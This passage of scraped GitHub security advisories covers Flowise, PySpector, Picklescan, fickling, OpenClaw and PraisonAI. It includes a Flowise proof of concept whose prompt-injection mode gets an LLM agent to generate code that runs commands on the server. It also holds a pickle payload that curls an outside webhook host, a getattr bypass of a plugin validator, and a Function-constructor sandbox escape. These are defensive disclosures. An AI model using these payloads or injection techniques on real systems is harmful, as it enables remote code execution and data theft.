options: ICommonObject): Promise\u003cstring | object\u003e {\n        const model = nodeData.inputs?.model as BaseLanguageModel\n        const baseId = nodeData.inputs?.baseId as string\n        const tableId = nodeData.inputs?.tableId as string\n        const returnAll = nodeData.inputs?.returnAll as boolean\n        const limit = nodeData.inputs?.limit as string\n        const moderations = nodeData.inputs?.inputModeration as Moderation[]\n\n        // !!! the chatflow may contain moderation nodes that search for prompt injections, but these may not protect from every type of injection\n        if (moderations \u0026\u0026 moderations.length \u003e 0) {\n            try {\n                // Use the output of the moderation chain as input for the Vectara chain\n                input = await checkInputs(moderations, input)\n            } catch (e) {\n                await new Promise((resolve) =\u003e setTimeout(resolve, 500))\n                // if (options.shouldStreamResponse) {\n                //     streamResponse(options.sseStreamer, options.chatId, e.message)\n                // }\n                return formatResponse(e.message)\n            }\n        }\n\n        const shouldStreamResponse = options.shouldStreamResponse\n        const sseStreamer: IServerSideEventStreamer = options.sseStreamer as IServerSideEventStreamer\n        const chatId = options.chatId\n\n        const credentialData = await getCredentialData(nodeData.credential ?? \u0027\u0027, options)\n        const accessToken = getCredentialParam(\u0027accessToken\u0027, credentialData, nodeData)\n\n        let airtableData: ICommonObject[] = []\n\n        // !!! Get Airtable data\n        if (returnAll) {\n            airtableData = await loadAll(baseId, tableId, accessToken)\n        } else {\n            airtableData = await loadLimit(limit ? parseInt(limit, 10) : 100, baseId, tableId, accessToken)\n        }\n\n        let base64String = Buffer.from(JSON.stringify(airtableData)).toString(\u0027base64\u0027)\n\n        const loggerHandler = new ConsoleCallbackHandler(options.logger, options?.orgId)\n        const callbacks = await additionalCallbacks(nodeData, options)\n\n        const pyodide = await LoadPyodide()\n\n        // First load the csv file and get the dataframe dictionary of column types\n        // For example using titanic.csv: {\u0027PassengerId\u0027: \u0027int64\u0027, \u0027Survived\u0027: \u0027int64\u0027, \u0027Pclass\u0027: \u0027int64\u0027, \u0027Name\u0027: \u0027object\u0027, \u0027Sex\u0027: \u0027object\u0027, \u0027Age\u0027: \u0027float64\u0027, \u0027SibSp\u0027: \u0027int64\u0027, \u0027Parch\u0027: \u0027int64\u0027, \u0027Ticket\u0027: \u0027object\u0027, \u0027Fare\u0027: \u0027float64\u0027, \u0027Cabin\u0027: \u0027object\u0027, \u0027Embarked\u0027: \u0027object\u0027}\n        let dataframeColDict = \u0027\u0027\n        try {\n            const code = `import pandas as pd\nimport base64\nimport json\n\nbase64_string = \"${base64String}\"\n\ndecoded_data = base64.b64decode(base64_string)\n\njson_data = json.loads(decoded_data)\n\ndf = pd.DataFrame(json_data)\nmy_dict = df.dtypes.astype(str).to_dict()\nprint(my_dict)\njson.dumps(my_dict)`\n            dataframeColDict = await pyodide.runPythonAsync(code)\n        } catch (error) {\n            throw new Error(error)\n        }\n\n        // !!! ask LLM to come up with python script...\n        // Then tell GPT to come out with ONLY python code\n        // For example: len(df), df[df[\u0027SibSp\u0027] \u003e 3][\u0027PassengerId\u0027].count()\n        let pythonCode = \u0027\u0027\n        if (dataframeColDict) {\n            const chain = new LLMChain({\n                llm: model,\n                // !!! prompt passed to LLM\n                prompt: PromptTemplate.fromTemplate(systemPrompt),\n                verbose: process.env.DEBUG === \u0027true\u0027 ? true : false\n            })\n            const inputs = {\n                // !!! Airtable column names are also subbed into the system prompt which may also contain prompt injections\n                dict: dataframeColDict,\n                // !!! question, which is later subbed into the system prompt, is given the value of the user\u0027s prompt (which may contain prompt injections)\n                question: input\n            }\n            const res = await chain.call(inputs, [loggerHandler, ...callbacks])\n            // !!! the LLM\u0027s responce is assigned to the pythonCode variable\n            pythonCode = res?.text\n            // Regex to get rid of markdown code blocks syntax\n            pythonCode = pythonCode.replace(/^```[a-z]+\\n|\\n```$/gm, \u0027\u0027)\n        }\n\n        // Then run the code using Pyodide (only after validating to prevent RCE)\n        let finalResult = \u0027\u0027\n        if (pythonCode) {\n            const validation = validatePythonCodeForDataFrame(pythonCode)\n            if (!validation.valid) {\n                throw new Error(\n                    `Generated code was rejected for security reasons (${\n                        validation.reason ?? \u0027unsafe construct\u0027\n                    }). Please rephrase your question to use only pandas DataFrame operations.`\n                )\n            }\n            try {\n                // !!! The python code is evaluated in a non-sandboxed environment\n                const code = `import pandas as pd\\n${pythonCode}`\n                // TODO: get print console output\n                finalResult = await pyodide.runPythonAsync(code)\n            } catch (error) {\n                throw new Error(`Sorry, I\u0027m unable to find answer for question: \"${input}\" using following code: \"${pythonCode}\"`)\n            }\n        }\n\n        // Finally, return a complete answer\n        if (finalResult) {\n            const chain = new LLMChain({\n                llm: model,\n                prompt: PromptTemplate.fromTemplate(finalSystemPrompt),\n                verbose: process.env.DEBUG === \u0027true\u0027 ? true : false\n            })\n            const inputs = {\n                question: input,\n                answer: finalResult\n            }\n\n            if (options.shouldStreamResponse) {\n                const handler = new CustomChainHandler(shouldStreamResponse ? sseStreamer : undefined, chatId)\n                const result = await chain.call(inputs, [loggerHandler, handler, ...callbacks])\n                return result?.text\n            } else {\n                const result = await chain.call(inputs, [loggerHandler, ...callbacks])\n                return result?.text\n            }\n        }\n\n        return pythonCode\n    }\n}\n\n```\n\n### Proof of Concept\n\nA proof of concept for this vulnerability is provided in ./poc.py. It expects the following syntax:\n\n```\n    python3 poc.py --method [server OR chatflow OR prompt_injection] [--user \u003cUSER\u003e --passwd \u003cpassword\u003e --host \u003cHOST\u003e --r_host \u003cR_HOST\u003e --r_port \u003cR_PORT\u003e --l_port \u003cL_PORT\u003e --port \u003cPORT\u003e --cmd \u003cCMD\u003e --chatflow_id \u003cCHAT_ID\u003e --airtable_token \u003cAIRTABLE_TOKEN\u003e --base_id \u003cBASE_ID\u003e --table_id \u003cTABLE_ID\u003e]\n```\n\nWhere USER is a username of a user on the server, PASSWORD is the user\u0027s password, HOST is the ip address of the vulnerable flowise server, R_HOST is the ip address of a malicious server started by this poc, R_PORT is the port a malicious server started by this poc is listening on (default: 5000), L_PORT is the port a malicious server started by this poc should listening on (default: 5000), PORT is the port the vulnerable flowise server is listening on (default: 3000), CMD is the command to execute on the flowise server (default: xcalc), CHAT_ID is the chatflow id of a chatflow using the Airflow Agent node, AIRTABLE_TOKEN is an api key for an Airtable account, BASE_ID is the base id to find an airflow table in, and TABLE_ID is the airflow table to use. \n\nThis poc has three modes of operation controlled by the method argument. The method argument may have any of the values \"server\" OR \"chatflow\" OR \"prompt_injection\".\n\n#### method = \"server\"\n\nBy default the poc will start a malicious server listening on the port specified by the \u003cL_PORT\u003e value. This server will respond to requests made to the \"/api/chat\" endpoint with a JSON object containing an LLM response that contains a malicious python script. This python script will execute a command specified by the \u003cCMD\u003e value.\n\n#### method = \"chatflow\"\n\nBy default, the poc will first establish an authenticated session on the server using the \u003cUSER\u003e and \u003cPASSWORD\u003e arguments. It will then send a POST request to the \"/api/v1/chatflow\" endpoint with a JSON body containing a crafted chatflow using an Airflow Agent node and a ChatOllama node configured with a server specified by the \u003cR_HOST\u003e and \u003cR_PORT\u003e arguments. The Airflow Agent node will be configured using the \u003cAIRTABLE_TOKEN\u003e, \u003cBASE_ID\u003e, and \u003cTABLE_ID\u003e arguments. The default values of these arguments will be valid for 14 days from 2026-02-22. The poc will then send a POST request to the \"/api/v1/internal-prediction/\" endpoint in order to trigger a prediction using the chatflow. \n\nIt is intended that the server specified in the chatflow is a server started using the server method of this poc. When making a prediction against this chatflow, flowise will send a request to the specified server in order to generate an LLM response. The response recieved by flowise will be evaluated as a python script. Upon successful exploitation, The \u003cCMD\u003e argument passed to the server method of this poc will be executed on the vulnerable flowise server. \n\n#### method = \"prompt_injection\"\n\nBy default, the poc will send a POST request to the \"/api/v1/prediction/*chat_id*\" endpoint, where *chat_id* is a vulnerable chatflow id specified by the \u003cCHAT_ID\u003e parameter. The JSON body of this request will contain a question member whose value will be a prompt containing a prompt injection. Upon successful exploitation, The \u003cCMD\u003e argument will be executed on the vulnerable flowise server.\n\nDue to the nature of LLM responses, it may take multiple attempts to be successful or require a different prompt injection technique depending on the model used.\n\n### Testing Environment\n\nThe provided proof of concept was tested using FlowiseAI Flowise version 3.0.13 runing on a Ubuntu 25.10 VM. The prompt injection method was tested using the Llama3.2 model running in Ollama.\n\n### How This Differs from CVE-2026-41138\nCVE-2026-41138 introduced sanitization for the Pyodide code ran by the Airtable Agent. This advisory demonstrates a bypass of that sanitization, which we addressed separately by disallowing imports outright.",
  "id": "GHSA-v38x-c887-992f",
  "modified": "2026-04-24T20:57:39Z",
  "published": "2026-04-18T00:46:04Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-v38x-c887-992f"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41265"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/FlowiseAI/Flowise"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Flowise: Airtable_Agent Code Injection Remote Code Execution Vulnerability"
}

GHSA-V3XV-8VC3-H2M6

Vulnerability from github – Published: 2026-03-18 16:33 – Updated: 2026-03-20 21:33
VLAI
Summary
PySpector has a Plugin Sandbox Bypass leads to Arbitrary Code Execution
Details

Summary

PySpector versions <= 0.1.6 are affected by a security validation bypass in the plugin system. The validate_plugin_code() function in plugin_system.py, performs static AST analysis to block dangerous API calls before a plugin is trusted and executed. However, the internal resolve_name() helper only handles ast.Name and ast.Attribute node types, returning None for all others. When a plugin uses indirect function calls via getattr() (such as getattr(os, 'system')) the outer call's func node is of type ast.Call, causing resolve_name() to return None, and the security check to be silently skipped. The plugin incorrectly passes the trust workflow, and executes arbitrary system commands on the user's machine when loaded.

Impact

An attacker who can deliver a malicious plugin file to a PySpector user and convince them to install it, can achieve arbitrary code execution on the user's local machine. Exploitation requires the victim to explicitly run pyspector plugin install --trust on the malicious file (a deliberate multi-step action that meaningfully limits the attack surface compared to passive vulnerabilities). However, the bypass directly undermines the security guarantee that validate_plugin_code() is designed to provide. Once the plugin is trusted and executed, the following is achievable: - Full read/write access to the local filesystem - Exfiltration of sensitive data and environment variables (i.e. API keys, credentials, etc...) - Establishment of persistence mechanisms - Lateral movement in CI/CD environments where PySpector runs with elevated permissions (pre-commit hooks and scheduled scans)

Any user of PySpector who installs third-party plugins outside the official repository is potentially affected.

PoC

The following steps reproduce the vulnerability on PySpector <= 0.1.6: 1. Create a malicious plugin file that uses getattr-based indirect calls to bypass AST validation, and confirm the validator incorrectly marks it as safe: image 2. Run PySpector Plugin Validator module (this confirms the validator incorrectly marks the plugin as safe): image 3. Install and trust the plugin through the normal PySpector workflow:

pyspector plugin install /tmp/evil_plugin.py --trust 4. Execute the plugin, during a scan: pyspector scan /any/target --plugin evil

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.1.6"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "pyspector"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.1.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33139"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-184"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-18T16:33:34Z",
    "nvd_published_at": "2026-03-20T20:16:48Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nPySpector versions `\u003c= 0.1.6` are affected by a security validation bypass in the plugin system. The `validate_plugin_code()` function in `plugin_system.py`, performs static AST analysis to block dangerous API calls before a plugin is trusted and executed. However, the `internal resolve_name()` helper only handles `ast.Name` and `ast.Attribute` node types, returning `None` for all others. When a plugin uses indirect function calls via `getattr()` (such as `getattr(os, \u0027system\u0027)`) the outer call\u0027s func node is of type `ast.Call`, causing `resolve_name()` to return `None`, and the security check to be silently skipped. The plugin incorrectly passes the trust workflow, and executes arbitrary system commands on the user\u0027s machine when loaded.\n\n### Impact\nAn attacker who can deliver a malicious plugin file to a PySpector user and convince them to install it, can achieve arbitrary code execution on the user\u0027s local machine. Exploitation requires the victim to explicitly run `pyspector plugin install --trust` on the malicious file (a deliberate multi-step action that meaningfully limits the attack surface compared to passive vulnerabilities). However, the bypass directly undermines the security guarantee that `validate_plugin_code()` is designed to provide. Once the plugin is trusted and executed, the following is achievable:\n- Full read/write access to the local filesystem\n- Exfiltration of sensitive data and environment variables (i.e. API keys, credentials, etc...)\n- Establishment of persistence mechanisms\n- Lateral movement in CI/CD environments where PySpector runs with elevated permissions (pre-commit hooks and scheduled scans)\n\nAny user of PySpector who installs third-party plugins outside the official repository is potentially affected.\n\n### PoC\nThe following steps reproduce the vulnerability on PySpector `\u003c= 0.1.6`:\n1. Create a malicious plugin file that uses getattr-based indirect calls to bypass AST validation, and confirm the validator incorrectly marks it as safe:\n\u003cimg width=\"1300\" height=\"675\" alt=\"image\" src=\"https://github.com/user-attachments/assets/4de3a0d1-1c77-4454-ad10-2369d5ca9997\" /\u003e\n2.  Run PySpector Plugin Validator module (this confirms the validator incorrectly marks the plugin as safe):\n\u003cimg width=\"908\" height=\"239\" alt=\"image\" src=\"https://github.com/user-attachments/assets/3e3b9603-4d95-4a39-be97-4163f6639599\" /\u003e\n3. Install and trust the plugin through the normal PySpector workflow:\n\n`pyspector plugin install /tmp/evil_plugin.py --trust`\n4. Execute the plugin, during a scan:\n`pyspector scan /any/target --plugin evil`",
  "id": "GHSA-v3xv-8vc3-h2m6",
  "modified": "2026-03-20T21:33:07Z",
  "published": "2026-03-18T16:33:34Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/ParzivalHack/PySpector/security/advisories/GHSA-v3xv-8vc3-h2m6"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33139"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/ParzivalHack/PySpector"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "PySpector has a Plugin Sandbox Bypass leads to Arbitrary Code Execution"
}

GHSA-V7X6-RV5Q-MHWC

Vulnerability from github – Published: 2025-04-07 19:37 – Updated: 2025-04-07 19:37
VLAI
Summary
Picklescan missing detection when calling built-in python library function timeit.timeit()
Details

Summary

Using timeit.timeit() function, which is a built-in python library function to execute remote pickle file.

Details

Pickle’s deserialization process is known to allow execution of function via reduce method. While Picklescan is meant to detect such exploits, this attack evades detection by calling built-in python library function like timeit.timeit(). And since timeit library wasn't inside unsafe globals blacklist, it may not raise red flag in the security scan.

The attack payload executes in the following steps:

First, the attacker craft the payload by calling to timeit.timeit() function from timeit library in reduce method Then, inside reduce method, the attacker import dangerous libarary like os and calling os.system() to run OS commands, for example: curl command. And then the attacker send this malicious pickle file to the victim. Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution.

PoC

  1. The attacker crafted a malicious pickle file using built-in python library function timeit.timeit()
import pickle
import timeit
class Payload(object):
    def __reduce__(self):
        return timeit.timeit, ('','import os; os.system("curl https://webhook.site/95f3e1c3-ee37-4a5a-8544-ab4ce93475f6")')
def create_payload():
  with open('payload.pickle', 'wb') as f:
    pickle.dump(Payload(), f)
create_payload()

Then the attacker will send this pickle file to the victim computer and maybe the victim load this pickle using pickle.load() 2. The victim will use picklescan library to check out if the received pickle file is malicious or not

picklescan -p payload.pickle
----------- SCAN SUMMARY -----------
Scanned files: 1
Infected files: 0
Dangerous globals: 0
  1. Beliving that this pickle file is safe using modelscan, the victim then load this pickle file which will trigger timeit.timeit command to execute OS commands (in my example, it was curl command)
import pickle
def load_payload():
    with open('payload.pickle', 'rb') as f:
      pickle.load(f)
load_payload()

Impact

Severity: High

Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models. What is the impact? Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loaded. Supply Chain Attack: Attackers can distribute infected pickle files across ML models, APIs, or saved Python objects.

Recommended Solution

I suggest adding timeit library to the unsafe globals blacklist.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "picklescan"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.0.25"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-184"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-04-07T19:37:21Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "### Summary\nUsing timeit.timeit() function, which is a built-in python library function to execute remote pickle file.\n\n### Details\nPickle\u2019s deserialization process is known to allow execution of function via reduce method. While Picklescan is meant to detect such exploits, this attack evades detection by calling built-in python library function like **timeit.timeit()**. And since timeit library wasn\u0027t inside unsafe globals blacklist, it may not raise red flag in the security scan.\n\nThe attack payload executes in the following steps:\n\nFirst, the attacker craft the payload by calling to **timeit.timeit()** function from timeit library in __reduce__ method\nThen, inside reduce method, the attacker import dangerous libarary like os and calling **os.system()** to run OS commands, for example: curl command. And then the attacker send this malicious pickle file to the victim.\nThen when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn\u0027t dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution.\n\n### PoC\n1. The attacker crafted a malicious pickle file using built-in python library function timeit.timeit()\n```\nimport pickle\nimport timeit\nclass Payload(object):\n    def __reduce__(self):\n        return timeit.timeit, (\u0027\u0027,\u0027import os; os.system(\"curl https://webhook.site/95f3e1c3-ee37-4a5a-8544-ab4ce93475f6\")\u0027)\ndef create_payload():\n  with open(\u0027payload.pickle\u0027, \u0027wb\u0027) as f:\n    pickle.dump(Payload(), f)\ncreate_payload()\n```\nThen the attacker will send this pickle file to the victim computer and maybe the victim load this pickle using pickle.load()\n2. The victim will use picklescan library to check out if the received pickle file is malicious or not\n```\npicklescan -p payload.pickle\n----------- SCAN SUMMARY -----------\nScanned files: 1\nInfected files: 0\nDangerous globals: 0\n```\n3. Beliving that this pickle file is safe using modelscan, the victim then load this pickle file which will trigger timeit.timeit command to execute OS commands (in my example, it was curl command)\n```\nimport pickle\ndef load_payload():\n    with open(\u0027payload.pickle\u0027, \u0027rb\u0027) as f:\n      pickle.load(f)\nload_payload()\n```\n### Impact\nSeverity: High\n\nWho is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models.\nWhat is the impact? Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loaded.\nSupply Chain Attack: Attackers can distribute infected pickle files across ML models, APIs, or saved Python objects.\n### Recommended Solution\nI suggest adding timeit library to the unsafe globals blacklist.",
  "id": "GHSA-v7x6-rv5q-mhwc",
  "modified": "2025-04-07T19:37:22Z",
  "published": "2025-04-07T19:37:21Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-v7x6-rv5q-mhwc"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mmaitre314/picklescan/pull/40"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/mmaitre314/picklescan"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mmaitre314/picklescan/releases/tag/v0.0.25"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Picklescan missing detection when calling built-in python library function timeit.timeit()"
}

GHSA-V8CR-9JRC-FWF9

Vulnerability from github – Published: 2026-07-04 15:30 – Updated: 2026-07-04 15:30
VLAI
Details

Trail of Bits fickling versions up to and including 0.1.10 do not include the Python standard library modules _posixsubprocess, site, and atexit in the UNSAFE_IMPORTS denylist (fickle.py). Because these modules are absent from the denylist, fickling's check_safety() function returns LIKELY_SAFE with zero findings for pickle payloads that invoke dangerous functions including _posixsubprocess.fork_exec (C-level process spawner capable of executing arbitrary binaries), site.execsitecustomize (executes arbitrary site customization code), and atexit._run_exitfuncs (triggers all registered exit handler callbacks). The fickling.load() API chains check_safety() into pickle.loads() as an explicit security gate; a LIKELY_SAFE verdict causes the payload to be deserialized and executed. This shares the same root cause as CVE-2026-22607 (cProfile), CVE-2025-67748 (pty), and CVE-2025-67747 (marshal/types). OvertlyBadEvals does not flag these modules because they are standard library imports. UnsafeImports does not flag them because they are not in the denylist. The UnusedVariables heuristic is defeated by the SETITEMS opcode pattern.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-14534"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-184"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-07-04T14:16:28Z",
    "severity": "HIGH"
  },
  "details": "Trail of Bits fickling versions up to and including 0.1.10 do not include the Python standard library modules _posixsubprocess, site, and atexit in the UNSAFE_IMPORTS denylist (fickle.py). Because these modules are absent from the denylist, fickling\u0027s check_safety() function returns LIKELY_SAFE with zero findings for pickle payloads that invoke dangerous functions including _posixsubprocess.fork_exec (C-level process spawner capable of executing arbitrary binaries), site.execsitecustomize (executes arbitrary site customization code), and atexit._run_exitfuncs (triggers all registered exit handler callbacks). The fickling.load() API chains check_safety() into pickle.loads() as an explicit security gate; a LIKELY_SAFE verdict causes the payload to be deserialized and executed. This shares the same root cause as CVE-2026-22607 (cProfile), CVE-2025-67748 (pty), and CVE-2025-67747 (marshal/types). OvertlyBadEvals does not flag these modules because they are standard library imports. UnsafeImports does not flag them because they are not in the denylist. The UnusedVariables heuristic is defeated by the SETITEMS opcode pattern.",
  "id": "GHSA-v8cr-9jrc-fwf9",
  "modified": "2026-07-04T15:30:23Z",
  "published": "2026-07-04T15:30:23Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/trailofbits/fickling/security/advisories/GHSA-m6fh-58r7-x697"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-14534"
    },
    {
      "type": "WEB",
      "url": "https://github.com/trailofbits/fickling/pull/272"
    },
    {
      "type": "WEB",
      "url": "https://github.com/trailofbits/fickling/commit/e8408615b63adf034f891f653692ab9b51f0f5af"
    },
    {
      "type": "WEB",
      "url": "https://github.com/trailofbits/fickling/releases/tag/v0.1.11"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-VFP4-8X56-J7C5

Vulnerability from github – Published: 2026-04-17 21:54 – Updated: 2026-05-12 13:35
VLAI
Summary
OpenClaw: Exec environment denylist missed high-risk interpreter startup variables
Details

Summary

Exec environment denylist missed high-risk interpreter startup variables.

Affected Packages / Versions

  • Package: openclaw
  • Ecosystem: npm
  • Affected versions: < 2026.4.10
  • Patched versions: >= 2026.4.10

Impact

The exec environment policy missed interpreter startup variables such as VIMINIT, EXINIT, LUA_INIT, and HOSTALIASES, allowing operator-supplied environment overrides to influence downstream execution or network behavior.

Technical Details

The fix expands the host environment security policy denylist to cover these and related high-risk environment variables, with regression coverage.

Fix

The issue was fixed in #63277. The first stable tag containing the fix is v2026.4.10, and openclaw@2026.4.14 includes the fix.

Fix Commit(s)

  • 2d126fc62343a7b6895351f96e4e1474bc358140
  • PR: #63277

Release Process Note

Users should upgrade to openclaw 2026.4.10 or newer. The latest npm release, 2026.4.14, already includes the fix.

Credits

Thanks to @feiyang666 of Tencent zhuque Lab (https://github.com/Tencent/AI-Infra-Guard) for reporting this issue.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "openclaw"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2026.4.10"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-43584"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-184"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-17T21:54:20Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "## Summary\n\nExec environment denylist missed high-risk interpreter startup variables.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `\u003c 2026.4.10`\n- Patched versions: `\u003e= 2026.4.10`\n\n## Impact\n\nThe exec environment policy missed interpreter startup variables such as `VIMINIT`, `EXINIT`, `LUA_INIT`, and `HOSTALIASES`, allowing operator-supplied environment overrides to influence downstream execution or network behavior.\n\n## Technical Details\n\nThe fix expands the host environment security policy denylist to cover these and related high-risk environment variables, with regression coverage.\n\n## Fix\n\nThe issue was fixed in #63277. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `2d126fc62343a7b6895351f96e4e1474bc358140`\n- PR: #63277\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.10 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @feiyang666 of Tencent zhuque Lab (https://github.com/Tencent/AI-Infra-Guard) for reporting this issue.",
  "id": "GHSA-vfp4-8x56-j7c5",
  "modified": "2026-05-12T13:35:13Z",
  "published": "2026-04-17T21:54:20Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-vfp4-8x56-j7c5"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43584"
    },
    {
      "type": "WEB",
      "url": "https://github.com/openclaw/openclaw/commit/2d126fc62343a7b6895351f96e4e1474bc358140"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/openclaw/openclaw"
    },
    {
      "type": "WEB",
      "url": "https://www.vulncheck.com/advisories/openclaw-insufficient-environment-variable-denylist-in-exec-policy"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "OpenClaw: Exec environment denylist missed high-risk interpreter startup variables"
}

GHSA-VMMJ-PFW7-FJWP

Vulnerability from github – Published: 2026-06-18 14:26 – Updated: 2026-06-18 14:26
VLAI
Summary
npm PraisonAI codeMode sandbox escape via Function constructor
Details

Summary

The published npm package praisonai exports a TypeScript built-in tool named codeMode. The package describes this tool as executing code in a sandboxed environment, marks its capability as sandbox: true, and registers it through the public tools facade.

The implementation does not create an isolation boundary. It applies a small regular-expression blocklist, sets process and require to undefined inside a plain JavaScript object, and then executes attacker-controlled code with the host process new Function constructor:

const fn = new Function('sandbox', `with (sandbox) { ${code} }`);
const result = fn(sandbox);

Because this runs in the host V8 context, code inside codeMode can use the JavaScript prototype chain to recover the real Function constructor:

({}).constructor.constructor('return process')()

From a normal CommonJS application script, the recovered process object exposes process.mainModule.require. That bypasses the explicit require('fs') and require('child_process') controls and allows host filesystem access and subprocess execution from code that was supposed to be sandboxed.

Technical Details

Current-head source says codeMode is a built-in package tool and explicitly advertises a sandbox boundary:

src/praisonai-ts/src/tools/builtins/code-mode.ts
  13: description: 'Execute code that can import and use other tools in a sandboxed environment',
  24: capabilities: {
  25:   sandbox: true,
  26:   code: true,
  28: packageName: 'praisonai',
  85: description: 'Execute code in a sandboxed environment with access to imported tools. Write files, run code, and get results.',

The same file implements security as a blocklist of exact source-code patterns:

src/praisonai-ts/src/tools/builtins/code-mode.ts
  108: const blockedPatterns = [
  109:   /require\s*\(\s*['"]child_process['"]\s*\)/,
  110:   /require\s*\(\s*['"]fs['"]\s*\)/,
  111:   /import\s+.*from\s+['"]child_process['"]/,
  112:   /process\.exit/,
  113:   /eval\s*\(/,

It then tries to hide dangerous globals by shadowing names in a normal object:

src/praisonai-ts/src/tools/builtins/code-mode.ts
  168: process: undefined,
  169: require: undefined,

Finally, it executes the untrusted code in the host process using new Function and with (sandbox):

src/praisonai-ts/src/tools/builtins/code-mode.ts
  187: const fn = new Function(
  188:   'sandbox',
  189:   `with (sandbox) { ${code} }`
  190: );
  191: const result = fn(sandbox);

This is not a sandbox. new Function does not create a separate security context, and variable shadowing does not remove access to constructors reachable through normal JavaScript objects.

The tool is reachable through the public npm SDK:

src/praisonai-ts/src/index.ts
  117: airweaveSearch, codeMode,

src/praisonai-ts/src/tools/tools.ts
  104: // Code Mode
  105: registry.register(CODE_MODE_METADATA, createCodeModeTool as ToolFactory);
  167: // Code Mode
  168: codeMode: (config?: CodeModeConfig) => codeMode(config),

Why This Is Not Intended Behavior

This is not merely "the user can execute code because codeMode executes code." The vulnerability is that code which is explicitly described and exposed as sandboxed can escape the intended restrictions.

The implementation itself proves an intended security boundary exists:

  • CODE_MODE_METADATA.capabilities.sandbox is true;
  • the tool description says it executes in a sandboxed environment;
  • direct access to fs and child_process is explicitly blocked;
  • process and require are explicitly shadowed as undefined;
  • allowNetwork defaults to false; and
  • the config includes security-relevant controls such as blockedTools, allowedPaths, timeoutMs, and maxMemoryMb.

